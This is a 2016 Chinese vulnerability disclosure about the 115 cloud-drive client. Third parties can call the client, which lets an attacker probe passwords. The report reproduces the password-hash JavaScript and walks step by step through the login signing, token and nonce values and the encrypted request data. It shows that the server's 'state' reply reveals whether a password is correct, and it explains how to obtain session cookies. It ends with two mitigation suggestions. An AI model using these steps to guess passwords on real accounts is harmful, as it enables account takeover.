首页 > 安全 > 网络安全 >

115网盘存在被口令探测的漏洞

2016-07-06

115网盘强制用户使用其客户端,但其客户端安全措施不够严密,可被第三方直接调用,存在被口令探测的漏洞。115网盘存在被口令探测的漏洞。

1、115网盘强制用户使用其客户端,但其客户端安全措施不够严密,可被第三方直接调用,存在被口令探测的漏洞

以下所作工作是基于对115浏览器**.**.**.**版本的调试而得出的。

计算密码哈希的javascript函数代码如下,是从115网盘首页中提取出来的:

function a(a) {

var b = a;

if (48 == a.length) {

a = a.split("");

var c, d, e, f, g;

for (g = 0, c = 0, d = a.length; d > c; c++) {

g += parseInt(a[c], 16);

}

for (g = parseInt(a[0], 16) - g % 2 * 2, 0 > g && (g += 16), a[0] = g.toString(16), c = n.length - 1; c >= 0 && (a.reverse(), e = n[c], f = a[e], g = parseInt(f, 16), g = a.splice(e + g, 1), g[0] == a.pop()); c--) {

;

}

return a.join("");

}

return oofUtil.security.sha1(b);

};

2、当前时间值:1459842815

构造出以下字符串:abc@**.**.**.**1459842815

调用chrome偏移2550函数,得到sign值:6b5d0c41752206b691b6fcc491d3597f

构造出以下字符串:

{"GUID":"33f43f86bbe810a06738","account":"abc@**.**.**.**","device":"LENOVO-PC","de

vice_id":"000C29E9FB9E","device_type":"windows","disk_serial":"","dk":"","enviro

nment":0,"network":"5","passwd":"40bd001563085f??????329ea1ff5c5ecbdbbeef","sign

":"6b5d0c41752206b691b6fcc491d3597f","system_info":"242B4A463E9F042F649336A45264

9C79E0EB0719D4BEDF3F77","time":1459842815}***************

1459842815

构造出以下字符串:

!@###@#1459842815DFDR@#@#

!@###@#1459842815DFDR@#@#

调用chrome偏移2550函数,得到入口值:

0c04b537fc32a3be9d1d1754d883269c****************

以************处字符串为参数,调用chrome偏移7950函数,得到postdata数据:

TGe9ohgKdO9Fyovsa+XB30OoYSCwOXGO4RfM33xoJBFk3w96vMFx9rMxOB8HACGWopaI6WqSuj1AaNl7

4rfB6wfOZFGhV6xInuDozKEhnWYAmsL6xIzNAShMjR+vbb2IcUfT9MB+lwszKiXQlEPOKcAwHtRZr2i1

aaHLDxaxCVMnb8dmxQHBcx+DL9M9QFX8y6bCrWmMGz5aOF/g3kB5PYwDM/9VS8e37u+AzZV0WLny6VWg

fdi7A/ywFqKYagup/tMaYltT7f/KgIoWktQ1i9QgabsYnPpYDS0treJaBkngclx0jxgd7EkRhf58rCZt

X5bGVjw1tgWFGpqMd02cvcsvkU2SHbDwmJYSJYYvnkpSfvsl7p/cnhg0swKAXrLubXWkwa174EdduSd4

DPHD4FQc1U+XKnfTMjLvOabL7EBi3mGCVOu1lDy6oRGNMmmmJuv6UC9abVWoSL1WfQ6H4K58tkYHyycH

8WSZdhKPIAPlUFc1crpRP+JyJVkC8j+GMibFrm1ozRht24vUZPADZiwt7ayzeZTvoEZbFh8JYGYxtSQG

JWT9Kfoj3aLvUTNAwNwRZumJMLmFVrDN1oFSQepFuX2IhXIkHFHZUWZ/eVHgTVh8ZIkD5Mv9ERCCoKeN

ZxQJAliD3PJwooWRwNAijIoAJO7jByBFFKb05E4v5zo=

1459842815

1459842815

调用chrome偏移F5D0函数,得到入口值:

13104316415249517

13104316415249517

再调用chrome偏移2550函数,得到nonce值:

ec413b74fba8fbc295dde750875f9eb1

构造以下字符串:

115ec413b74fba8fbc295dde750875f9eb1abc@**.**.**.**1459842815115

再调用chrome偏移2550函数,得到token值:

b578abf9a8c3727e8346c80ec67f761a

向115服务器发送POST数据,服务器响应如图2。

此处的

"state":true

代表帐号密码正确,否则为

"state":false

115网盘的口令探测即可从此下手。

3、115网盘服务器返回以下字符串:

eRUxTIyPekrY1rBO8xkG9Bj9MoFat9M80mwtbxmZR2oQ0UHrgRIMHmECfM+Lw/gThgmoyLC4vRba7O7q

lzTgEQjNCTPyK6kp76tWfIHzT7D3tNmtx34GNrmURzsh2a6ofimIA/k2hwCuqBmxIxjD3g2qI298uKAD

E8k5H04dNV5jy1aGcnN8iqLOhEtLJbAWGINQOhCaC3JPZ3BMsBev8dL4qBbzr73738Z0BMhAMWIsEy77

yfhBtYI/wZOoGSHekhnVoy2MOw8PUnLwtclkIbMPRzk9CfKcvnyf+a3h5Q3dGgBhq58KkkAp1oSzvlvo

MwY7fqLWsxrdIZ1y39Q9x00TbCkWjCVo4JGOjd+cfCOlqz0j0jarHsv6CGmXyGB8NiZPHI8tszCBUkqL

mvPUskBXHHZmWRjtQVdyrGOTluW8UvdSWSrq3BuO5se0mSUnpY2hqAQAz9ortxHOatKeHuv9+D5sKYdj

IEdrr/sc8CqFA7SQgJ6DnIIlftLRUFbH

利用chrome偏移7A10函数,对115网盘服务器返回的以上字符串进行解码,得到:

{"cookie":{"UID":"360???041_A1_1456735426","CID":"60c500324cc74787ab151f712f9d9c

77","SEID":"8d2bc2a9559df43f2907b758c30d428389c81f36c6f065f6cea5e786ade1ebb4499a

61776548f15b44db1aea2d71457a00c1000d8e22899ce9eca720"},"user_id":360???041,"emai

l":"[email protected]??.com","mobile":""}

向/app/user/info发送GET数据,得到115服务器响应如图3

调用chrome偏移74A0函数,得到入口值:

suW8oaN51pS1biJ7rgE4evX7wbO45qT0rjK6ohF3

帐号ID字符串:360???041

构造以下字符串:

360???041suW8oaN51pS1biJ7rgE4evX7wbO45qT0rjK6ohF3

利用chrome偏移2550函数,计算以上字符串的哈希值,得到cid入口:

6bf901e3f7bd3ecd35a85c5961548f0e

构造以下字符串:

21a02ea24e6301da58195c3945fd79f96bf901e3f7bd3ecd35a85c5961548f0e

再次调用chrome偏移2550函数,计算得到:

1955870b6559a85848a1c49c73c7a191

构造以下字符串:

10ba9a7f7d727df4a0daa784c464fa6d1c119d7666420ad640d62b48906a097e94389255514796d9

35989d1de09f4436e9868451f37eb78a0fa9aed31955870b6559a85848a1c49c73c7a191

计算出checkstring:-----------------

85178482fff519ba3566b4a266cb3d96

构造以下字符串:

{"seid":"10ba9a7f7d727df4a0daa784c464fa6d1c119d7666420ad640d62b48906a097e9438925

5514796d935989d1de09f4436e9868451f37eb78a0fa9aed3","cid":"21a02ea24e6301da58195c

3945fd79f9","uid":"360???041","check_string":"85178482fff519ba3566b4a266cb3d96"}

计算出:--------------

oaN5rgE4biJ71pS1suW8wbO4ohF3rjK65qT0evX7

ea67f5148b85d5e58e5eedde277d6c2f

调用chrome偏移7EC0函数,得到16进制密文:

3EEBC21ABBF1A8642F9EE60A74898782800B4D0D9B92733D7CC3A6161EBE582C7324201ACC19319B

2A63FA5B481F7DC73FD93951974FF96E99C3CCA5EDA77D27C1AAE7CDA20E7D2F42FE8D1E190735B1

918C3B0C7F63B67CF59B40701D41FFB73DA6050BF60F2DF24D2906230FDF2A1DAFDC4DBBE5A428DE

3099499C4B1C801C988070D7DB5366AD2CB37ED57447FB5E753D6F61788913377B6C4DD445D7BAD8

93A479999DAF3C5BEF904C0211947DC4551724047E5B6E052F3A84BA8B9197EB00D427DC4480C081

A27B4CFEC959BB8FA06FB410C30907A94641AA7AB5F4EF1D79EAB562C12EFD8530B5EC86CD750C5D

再次调用chrome偏移5960函数,得到clientverify:

PuvCGrvxqGQvnuYKdImHgoALTQ2bknM9fMOmFh6+WCxzJCAazBkxmypj+ltIH33HP9k5UZdP+W6Zw8yl

7ad9J8Gq582iDn0vQv6NHhkHNbGRjDsMf2O2fPWbQHAdQf+3PaYFC/YPLfJNKQYjD98qHa/cTbvlpCje

MJlJnEscgByYgHDX21NmrSyzftV0R/tedT1vYXiJEzd7bE3URde62JOkeZmdrzxb75BMAhGUfcRVFyQE

fltuBS86hLqLkZfrANQn3ESAwIGie0z+yVm7j6BvtBDDCQepRkGqerX07x156rViwS79hTC17IbNdQxd

向/app/auth/check发送POST数据,通过服务器验证,如图4。

记住Cookies,然后向**.**.**.**发送GET数据,即可以第三方浏览器访问115网盘。

以下为115网盘收集的附加POST数据,限于篇幅,此处省略解释。

ka.420165.

2bd49340659c2edc2735ed258c1beebe

09bb808bb87b7df5c9cbc7eeb379d0dd

1459842815

{"act":"lo","chn":1,"cid":"Intel(R) Core(TM) i3-4130 CPU @ 3.40GHz","crc":"2bd49

340659c2edc2735ed258c1beebe","ext1":"3071.6M","ext2":"","lang":"en-US","mid":"00

0C29E9FB9E","os":"6.1","res":"1024*768","sid":19,"timestamp":"1459842815","uid":

"","ver":"**.**.**.**","verify_str":"09bb808bb87b7df5c9cbc7eeb379d0dd"}

AQEc4W3NxledqSR27wlqoB+anLTUzAmzt43XeOkv0eoCrUYima+14x9uSUrHmHFd3l9qVno8CGb5b4gG

4rc4nJysbzu9NZkhLGa5vV2/ie8sF+vBlMGXY+VUgddO+JCeZi3Jd7TOM7ZmQS5lS3FLeBson25Y3rIC

ejn3NSe+nauL3Kv52P6fnB/tWMQGEqCHqsEg1u5agEYShsJ9wWYo2rXh7BNbYMdBnOocMRcirqRpvrJm

/kx1RHTas4kE7l2ZaLMaVykqYdqhe+fHZ4hiTqECWN/egrasvi5iRcg7MArjS5cwQznVLHLZAI1++3fd

WLq/QHBHDflbLTgs6JCyiR2+QT2RNY35I3HUGHpFMpf5gec7kzjtn6JwCQHppVHhkcIhUWPS4oSsYzDU

3azC/avwRcRnVh9/IeGkzeiUK3EaC5e8wVaMBuZQdmUp8LAINlHuM/a1YYReZYMXoAip0wBzcTgDoEKf

+4sbUnYbOBddF4ntMLMW0/V9SFc5VasuQsxzXwExU0U0oTPi4Z03G7mVLTD2MrdaSk/yT1BUkpxGvUmU

btkYMkU5kILlvYSSUmcLaSZvLe3Xmj8NhhTtqhpy5vnGnm3Kum2d4/e4Bes2QgRe95oLMnT466vyCEXZ

D3KVjnucn7Wk9ktWmv6FafZreGKVkqCKTncje3EyQmGe8/Ofo6pycGBz8Ta+CymgRVqwq9IT/3l4PED0

hdw8Dh33EUho7UhMGKhE3E6QHlYk7Sx9R6XnQ9RJdrCuKx/wf5rFA/K78TaH5pktaGnvm2bc/bQ9IJbW

TYxf5Y1VdrcasV2YyvO3lEd6ia0R0cbbTSIhlZrIhVt3fFkc/+yoIAfcxYseR1PPx/JpKxNO1xEROn3u

VW7bEQGqp78T6/261Chj+CO1nlOARoRR+/jvRtmSQ2vSxo5e0XalNo1MOpYtuHVT09sl4hGS6nRfl50T

xQprMNzHsro6Ue/xoIrVKj1Jvo5ZDMF+vhPLo2eM1d5h/DOS2oZdy84v4FJCxKinkAXiCU2Z8hI+J3x1

o2ZUsAfMlhYmHNjZcni4KExvTLCTyaAekt7lWDgVeuf2nWgrpBYdsn3chTbQE0rVGcat/w+qI3WgtRQW

TKP0gAlV+Q0H6xZA/sur/jQQacFh6k1ccyUenQxSqZYHYtztfrzg+ZSD/5NKhKiJkJSHD+thjTZMvhVh

DffjkL53owigskmnI4wuaT5hYc4YaNzABWnqgPcPc4KBcYc9YO8FXsc/Joptcw==

漏洞证明:

\

\

\

\

\

\

\

解决方案:

1.建议增加chrome.dll文件的安全强度

2.建议将账户口令的验证放到后面几步

相关文章
最新文章
热点推荐